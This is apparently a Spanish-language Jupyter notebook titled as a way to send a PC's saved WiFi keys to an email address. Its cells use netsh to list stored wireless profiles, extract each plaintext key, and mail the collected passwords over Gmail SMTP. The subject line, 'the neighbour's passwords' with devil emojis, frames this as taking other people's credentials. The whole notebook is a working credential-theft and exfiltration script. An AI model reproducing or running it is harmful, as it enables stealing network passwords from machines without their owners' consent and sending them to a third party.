# Enviar las claves de WiFi de una PC a tu correo

In [67]:

#Obtenemos las redes almacenadas en el equipo
from subprocess import check_output
output = check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
profiles = [line.split(":")[1][1:-1] for line in output if ("All User Profile" in line or "Perfil de todos los usuarios" in line)] 


In [74]:

#Extraemos las passwords de cada una de esas redes
passwords = ""
for network in profiles:
    results = check_output(['netsh', 'wlan', 'show', 'profile',network, 'key=clear']).decode('utf-8').split('\n')
    results = [b.split(":")[1][1:-1] for b in results if ("Key Content" in b or  "Contenido de la clave" in b)] 
    passwords= passwords + ("Red wifi: " + network + "     Contraseña: "+ results[0]+" <br/> ")


In [69]:
#Activar esto temporalmente 
#https://myaccount.google.com/lesssecureapps 
#Luego lo vuelves a desactivar

from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib, ssl

#Funcion para enviar el email
def send_mail(subject,sender_email, receiver_email, html,sender_password):
    message = MIMEMultipart("related")
    message["Subject"] = subject
    message["From"] = 'correo@gmail.com'
    message["To"] = receiver_email
    #Añadir contenido al mensaje
    msgText = MIMEText(html, 'html')
    message.attach(msgText)
    # Crear una conexión segura entre el server y el correo
    context = ssl.create_default_context()
    with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
        server.login(sender_email, sender_password)
        server.sendmail(sender_email, receiver_email, message.as_string())


In [73]:
#Definimos los parametros y credenciales
subject= '😈😈 Las passwords del vecino 😈😈'
sender_email = "sender.email@gmail.com"
sender_password = "laclavedelsender"
receiver_email = "receiver.email@gmail.com"
html = f"""\
    <html>
    <body>
        <span>Estas son las claves del vecino:
        <br/>
        {passwords}
        </span>
    </body>
    </html>
"""
#Enviamos el correo
send_mail(subject,sender_email,receiver_email,html,sender_password)